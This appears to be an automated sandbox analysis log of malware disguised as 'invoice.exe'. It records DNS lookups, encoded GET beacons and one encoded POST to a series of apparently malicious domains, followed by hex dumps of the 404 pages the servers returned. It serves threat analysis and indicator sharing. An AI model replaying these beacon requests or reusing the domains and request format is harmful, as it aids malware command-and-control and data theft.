            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FF2404 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00FF2404
            Source: global trafficHTTP traffic detected: GET /65ev/?MtXH8dRH=dwwIBvsgoPduu1x03LiLu+lQGDFRz/zz5BoPsCvlGePibN32srUYcBSr/DN58z3DeItGY9KIy82Fautrr2SZe1nede/ReFPQiUe32Ik0HHEAi+oCxkmAYmk=&EB04T=0hSTF8phw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.route4.orgConnection: closeUser-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
            Source: global trafficHTTP traffic detected: GET /x7sd/?EB04T=0hSTF8phw&MtXH8dRH=xxifBtz+TGalALhNcyBTN44Pt4/Sbh2VoP/cWgYTPpbNJICDVfxFhRGjE7kr1iNtdvbH3kOKnhtRMn3Y82SlrP3cRd6my2NsPT3JF2gfd9Xq5l5DKuckTiI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.subitoadomicilio.shopConnection: closeUser-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
            Source: global trafficHTTP traffic detected: GET /h2bb/?MtXH8dRH=qJKXiU3Y6HiR5EQ+73Yb2xdirYIwqZi0pOwD+eljRGtAAZDjMN2OxhxU5kptMPcWm3rk9DqOdiozjqcfWB2Wk1O1f7az6dmfaFVy77DKkP1oB1oCVi4cG1g=&EB04T=0hSTF8phw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.syvra.xyzConnection: closeUser-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
            Source: global trafficHTTP traffic detected: GET /edpl/?MtXH8dRH=q/xbqOJEbFxqZdP5Pq3VIJihKFYuoTJpC6d7rXUvusGBValkv/SoX8DUGkqJst/hxOtwmyY8Q6nb8zkY9ZrFeAmdQleBPpTMkSiDA6E42mjQ0ujKW4BvX8M=&EB04T=0hSTF8phw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.hm62t.topConnection: closeUser-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
            Source: global trafficHTTP traffic detected: GET /6m23/?MtXH8dRH=xNP+YF7kN8YyHFbGfhCbM4vPtrObLTBpZTX0aom8zYno+17KeimnOIL9nX5Ojh8oMyFsBplL+bbJn9Xx4KkSTeDh/PbqhhexF1uqyGHiSdrf0qV82I/xPx8=&EB04T=0hSTF8phw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.zhuoyueapp.topConnection: closeUser-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
            Source: global trafficHTTP traffic detected: GET /7d10/?MtXH8dRH=xmIOFBiXVr0/QiBtlfppycp69g4gIKv/lNzUf7vC8zcE0nFiYZS2LM+232gpuz68llXfjA35BroI76gEmief8pSzBK3ZVT8efzXjLgbijVAA5nUksQudIw0=&EB04T=0hSTF8phw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.autonashville.comConnection: closeUser-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
            Source: global trafficHTTP traffic detected: GET /m409/?MtXH8dRH=vgT3vdiL6XmHyQpuqznGmu4w6V9vwAtJ/QiZ74rQqCLiqTobayGplqDkxFD969c96YoECNzKpiIWNF3RdO36GE5+Hjm0BUXOD0JGo2GVPeYBG+tw9V1xstM=&EB04T=0hSTF8phw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.dom-2.onlineConnection: closeUser-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
            Source: global trafficHTTP traffic detected: GET /21tc/?MtXH8dRH=dZthOjk/1dPqZuqAGh/VZ5JieneFrO0O+sFz5UfhqKDq1IpY9KHnH85jTOrt8bOMtDp+Wqm6lvqy9EKuTgvz+0mfPUCSMg+fwe3gbMHC32F4Yn2Fr4fx3Q4=&EB04T=0hSTF8phw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.easyanalytics.siteConnection: closeUser-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
            Source: global trafficHTTP traffic detected: GET /1i25/?MtXH8dRH=hvoPcElTJ0Y3piwLtjSln1mmdkYNLw6anL/4ADmEhhaGoTcu5w6VaNtYttD808rfRbfsmOcnHjc3Cl4jYjdANHGjovYJiL0/kcRCteZsHg47/gztzPUw9dw=&EB04T=0hSTF8phw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.kalomor.topConnection: closeUser-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
            Source: global trafficDNS traffic detected: DNS query: www.teksales.space
            Source: global trafficDNS traffic detected: DNS query: 56.126.166.20.in-addr.arpa
            Source: global trafficDNS traffic detected: DNS query: www.linkbasic.net
            Source: global trafficDNS traffic detected: DNS query: www.route4.org
            Source: global trafficDNS traffic detected: DNS query: www.meery.store
            Source: global trafficDNS traffic detected: DNS query: www.subitoadomicilio.shop
            Source: global trafficDNS traffic detected: DNS query: www.syvra.xyz
            Source: global trafficDNS traffic detected: DNS query: www.hm62t.top
            Source: global trafficDNS traffic detected: DNS query: www.zhuoyueapp.top
            Source: global trafficDNS traffic detected: DNS query: www.pelus-pijama-pro.shop
            Source: global trafficDNS traffic detected: DNS query: www.autonashville.com
            Source: global trafficDNS traffic detected: DNS query: www.torkstallningar.shop
            Source: global trafficDNS traffic detected: DNS query: www.dom-2.online
            Source: global trafficDNS traffic detected: DNS query: www.easyanalytics.site
            Source: global trafficDNS traffic detected: DNS query: www.kalomor.top
            Source: unknownHTTP traffic detected: POST /x7sd/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.subitoadomicilio.shopOrigin: http://www.subitoadomicilio.shopContent-Length: 205Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeReferer: http://www.subitoadomicilio.shop/x7sd/User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0Data Raw: 4d 74 58 48 38 64 52 48 3d 38 7a 4b 2f 43 59 75 6c 4b 33 65 6c 4d 5a 67 2f 58 44 74 6d 4a 4b 63 36 36 66 44 66 53 69 69 42 72 65 66 4e 54 67 49 35 49 62 62 61 4b 62 69 51 66 76 5a 53 69 6a 36 6b 41 36 46 59 33 42 6b 30 57 34 54 76 32 6c 4f 6b 38 6d 64 44 42 30 4c 54 7a 32 65 4f 68 2f 48 6a 4b 4e 69 56 36 32 6c 52 47 44 72 6f 66 43 45 2f 65 4e 50 59 68 46 59 66 47 66 6b 43 43 43 47 50 46 37 4c 45 6b 35 6f 43 48 33 43 4e 79 37 36 5a 70 4f 64 34 4f 55 2f 39 39 73 4a 45 35 46 79 74 31 44 62 6d 7a 73 6f 45 79 6c 4a 73 56 76 58 50 4d 6c 53 48 73 37 64 64 32 61 59 31 35 70 48 54 31 58 67 58 68 72 2b 45 56 77 3d 3d Data Ascii: MtXH8dRH=8zK/CYulK3elMZg/XDtmJKc66fDfSiiBrefNTgI5IbbaKbiQfvZSij6kA6FY3Bk0W4Tv2lOk8mdDB0LTz2eOh/HjKNiV62lRGDrofCE/eNPYhFYfGfkCCCGPF7LEk5oCH3CNy76ZpOd4OU/99sJE5Fyt1DbmzsoEylJsVvXPMlSHs7dd2aY15pHT1XgXhr+EVw==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 13 Sep 2024 10:27:11 GMTContent-Type: text/htmlContent-Length: 58288Connection: closeVary: Accept-EncodingETag: "6691ebc2-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 13 Sep 2024 10:27:36 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 424Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 43 65 6e 74 4f 53 20 53 74 72 65 61 6d 29 20 50 48 50 2f 37 2e 34 2e 33 33 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 75 62 69 74 6f 61 64 6f 6d 69 63 69 6c 69 6f 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (CentOS Stream) PHP/7.4.33 Server at www.subitoadomicilio.shop Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 13 Sep 2024 10:27:38 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 424Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 43 65 6e 74 4f 53 20 53 74 72 65 61 6d 29 20 50 48 50 2f 37 2e 34 2e 33 33 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 75 62 69 74 6f 61 64 6f 6d 69 63 69 6c 69 6f 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (CentOS Stream) PHP/7.4.33 Server at www.subitoadomicilio.shop Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 13 Sep 2024 10:27:41 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 424Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 43 65 6e 74 4f 53 20 53 74 72 65 61 6d 29 20 50 48 50 2f 37 2e 34 2e 33 33 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 75 62 69 74 6f 61 64 6f 6d 69 63 69 6c 69 6f 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (CentOS Stream) PHP/7.4.33 Server at www.subitoadomicilio.shop Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 13 Sep 2024 10:27:43 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 424Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 43 65 6e 74 4f 53 20 53 74 72 65 61 6d 29 20 50 48 50 2f 37 2e 34 2e 33 33 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 75 62 69 74 6f 61 64 6f 6d 69 63 69 6c 69 6f 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (CentOS Stream) PHP/7.4.33 Server at www.subitoadomicilio.shop Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Sep 2024 10:27:50 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Sep 2024 10:27:52 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 